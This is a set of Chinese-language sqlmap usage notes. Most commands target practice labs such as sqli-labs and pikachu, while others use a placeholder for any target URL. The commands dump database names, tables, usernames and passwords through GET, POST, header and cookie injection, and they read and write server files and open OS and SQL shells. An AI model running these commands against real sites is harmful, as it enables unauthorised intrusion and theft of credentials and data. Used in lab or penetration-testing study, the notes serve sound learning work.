pip install sqlmap
sqlmap
sqlmap -u "目标网址" --dbs
sqlmap -u "目标网址" -D [数据库名] --tables
sqlmap -u "目标网址" -D [数据库名] -T [表名] --columns
sqlmap -u "目标网址" -D [数据库名] -T [表名] -C [列名] --dump
指定报错注入
sqlmap -u "目标网址" --dbs --batch --threads 10 --technique E
post类
sqlmap -u "目标网址" --data "uname=123*&password=123&submit=submit" --dbs --batch --threads 10 --technique E
sqlmap -u "http://127.0.0.1/sqli-labs/Less-11/" --data "uname=usss*&passwd=passwd&submit=Submit" --dbs --batch --threads 10 --technique BETS --level 5
http头注入
burp抓包,要攻击的地方*
sqlmap -r "./a.txt" --dbs --threads 10 --batch --technique BETS
或者
sqlmap -u "目标网址" --user-agent="xxx*" --level 4 --dbs --threads 10 --batch --technique BETS
读取文件
Sqlmap -u "
http://pikachu.com/vul/sqli/sqli_str.php?name=a&submit=submit" --file-read "c:/a.txt"
写入文件
Sqlmap -u "
http://pikachu.com/vul/sqli/sqli_str.php?name=a&submit=submit" --file-write "1.txt" --file-dest "c:/123.txt"
//将本地目录下的1.txt写到目标url下的c盘下
执行os-shell
注意!!!!!你必须确认你网站的路径
sqlmap -u "
http://pikachu.com/vul/sqli/sqli_str.php?name=a&submit=submit" --os-shell
连接数据库执行数据库shell命令
Sqlmap -d mysql://[数据库用户名]:[密码]@127.0.0.1:3306/haha --sql-shell
sqlmap -u '192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1' # 检测注入点是否可用
sqlmap -u '192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1' --current-user #web数据库使用账户
sqlmap -u '192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1' --users #列出sql所有用户
sqlmap -u '192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1' --passwords #数据库账户与密码
sqlmap -u ‘192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1’ --tables #输出所有的表
burp抓包保存为1.txt
sqlmap -r 1.txt --dbs #可曝出该mysql中所有数据库名称
sqlmap -r 1.txt --current-db #web当前使用的数据库
1. sqlmap -u [目标url] --dbs //获取目标网站的所有数据库库名 发现security库
// sqlmap -u '192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1' --current-db #web当前使用的数据库
2. sqlmap -u [目标url] -D [第一步获取某个数据库的名字] --tables //获取库里的表
3. sqlmap -u [目标url] -D [数据库名] -T [库中的某个表名] --columns //发现users表的列 发现id username password
4. sqlmap -u [目标url] -D [数据库名] -T [数据表名] -C username,password --dump //找到id,username,password的内容 获取相应表里的列的字段数据
sqlmap -u [目标url] --dbs --batch --threads 10 --technique U
忽略错误,使用sqlmap的10线程,使用union select注入目标网站 technique主要是注入的方法
sqlmap -u [目标url] --current-db --batch --threads 10 --technique E //使用报错注入 E是error based
sqlmap -u [目标url] --current-db --batch --threads 10 --technique B
sqlmap -u [目标url] --current-db --batch --threads 10 --technique T -v 3 //-v 3 是调整等级 可以不写
post代码传参结合数据库查询的语句:
$uname = $_POST['uname'];
$passwd = $_POST['password'];
select username,password from users where username='$uname' and password='$passwd' limit 0,1
sqlmap -u http://sqlilabs.njhack.xyz/Less-11/ --data "uname=admin*&passwd=admin&submit=Submit" --current-db --batch --threads 10 --technique E
--data 后面跟的是post的数据 *号标哪,就是让sqlmap打哪
POST型使用sqlmap方法2:
在burp抓到post的网页的包以后
在相应的windwos的sqlmap下输入
python sqlmap.py -r
之后把burp抓到的包保存为txt到桌面,直接拖到这个dos界面以后就可以了
sqlmap -u "目标url" --data "uname=admin*&passwd=admin&submit=Submit" --dbs --batch --threads 10 --technique E
#方法1
sqlmap -u http://sqlilabs.njhack.xyz/Less-18/ --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0*" --level 4 --dbs --threads 10 --batch --technique E
//在使用请求头注入的时候,--level必须大于3
user-agent注入 //sqlmap -u [网页的url地址] --user-agent="抓包得到的对应的内容*" --level 4 --dbs --threads 10 --batch --technique E
#方法2 使用burp (更好)
1.burp抓到相应的数据包 右键copy to file
2.进入刚才保存的txt文件 在User-Agent最后打个星号 *
3.将相应的txt文件拖到相应的根目录下
4.sqlmap -r "/root/shuju.txt" --dbs --batch --threads 10 --technique E
sqlmap -u http://sqlilabs.njhack.xyz/Less-20/index.php --cookie="uname = admin*;__cfduid=dab97c3dd6a54c5ca485d3e880af5ce271605180690" --level 4 --dbs --threads 10 --batch --technique BETS
// sqlmap -u [网页的url地址] --cookie="原来*的cookie内容" --level 4 --dbs --threads 10 --batch --technique E
#参数
#1.跑出当前数据库
sqlmap -u [执行注入网址](GET) --current-db(当前数据库) --batch(默认选择是) --threads
10 (使用10线程去注入) --level 5 (注入程度,最高为5)--technique B
#2.跑出当前数据表
sqlmap -u [执行注入网址] -D [选择注入的数据库名] --tables(想要注入它的数据表) --batch
--threads 10 --level 5 --technique B
#3.跑出数据列
sqlmap -u [执行注入网址] -D [选择注入的数据库名] -T [选择注入的数据表名] --columns(想
要注入它的数据列) --batch --threads 10 --level 5 --technique B
#4.进行数据榨取
sqlmap -u [执行注入网址] -D [选择注入的数据库名] -T [选择注入的数据表名] -C [选择想要
注入的数据列名](可多选,逗号分隔) --dump(进行数据榨取) --threads 10 --level5 --
technique B
#参数
#1.跑出当前数据库
sqlmap -u [执行注入网址](GET) --current-db(当前数据库) --batch(默认选择是) --threads
10 (使用10线程去注入) --level 5 (注入程度,最高为5)--technique T
#2.跑出当前数据表
sqlmap -u [执行注入网址] -D [选择注入的数据库名] --tables(想要注入它的数据表) --batch
--threads 10 --level 5 --technique T
#3.跑出数据列
sqlmap -u [执行注入网址] -D [选择注入的数据库名] -T [选择注入的数据表名] --columns(想
要注入它的数据列) --batch --threads 10 --level 5 --technique T
#4.进行数据榨取
sqlmap -u [执行注入网址] -D [选择注入的数据库名] -T [选择注入的数据表名] -C [选择想要
注入的数据列名](可多选,逗号分隔) --dump(进行数据榨取) --threads 10 --level5 --
technique T
http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --dbms mysql --dbs
http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --os windows --dbs
将所有结果转换为字符串,并用空格替换NULL结果 --no-cast
--no-escape
--invalid-bignum 大整数替换
--invalid-logical 布尔操作替换
--invalid-string 随机字符串替换
--prefix 设置前缀
--suffix 设置后缀
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" -- prefix="')" --suffix="and ('abc'='abc" --dbs
payload:id=('1') and ('abc'='abc')
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --tamper "least.py,varnish.py" --dbs
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --dbms cred="root:root" --dbs
--technique B 布尔盲注
--technique E 报错注入
--technique U union查询注入
--technique S 堆叠注入
--technique T 时间盲注
--technique Q 内联查询注入
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" -- technique T --time-sec 3 --dbs
--time -sec 时间盲注时间为3
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --union cols 12-18 --dbs
sqlmap -u "http://192.168.1.121/sqli/Less-1/?id=1" --union char aaa --dbs
sqlmap -r 1.txt [其他参数] --current-db
sqlmap -r 1.txt --current-db --batch -threads 10 #速度会快一点
sqlmap -r 1.txt --sql-shell --threads 10 --batch
sqlmap -u [url] --sql-shell
sqlmap -r 1.txt --os-shell (后续语言可以选PHP,后续还有路径。如果不手动输入,那么sqlmap会把常用路径自动爆破,未必会成功,手动输入选择2。)
sqlmap -u [url] --os-shell
#获得系统shell后可以输入系统命令,如ipconfig,netuser等
sqlmap -r 1.txt --file-read "E:/a.txt" -v 1
sqlmap -u [url] --file-read "[目标文件]" -v 1
sqlmap -r 1.txt --file-write nihao.txt --file-dest "E:/kali-liux.txt" --batch --threads 10 -v 1
#(--batch和--threads是没有限制的,都可以加)
sqlmap -u [url] --file-write [想要上传的文件] --file-dest [目标的文件位置] -v 1
sqlmap -u [网站的URL] --cookie "[抓到获取到的Cookie值]" --level 2
sqlmap -u http://www.any.com/sqli/Less-20/index.php --cookie "uname=admin" --level 2 –dbs
sqlmap -u http://www.any.com/sqli/Less-20/index.php --cookie "uname=admin" --level 2 --current-db
sqlmap -u http://www.any.com/sqli/Less-20/index.php --cookie "uname=admin" --level 2 –D security --tables
sqlmap -u http://www.any.com/sqli/Less-20/index.php --cookie "uname=admin" --level 2 -D security -T users --columns
sqlmap -u http://www.any.com/sqli/Less-20/index.php --cookie "uname=admin" --level 2 -D security -T users -C password,username –dump
文章来源地址https://www.toymoban.com/news/detail-462568.html
文章来源:https://www.toymoban.com/news/detail-462568.html
到了这里,关于Sqlmap工具使用笔记的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!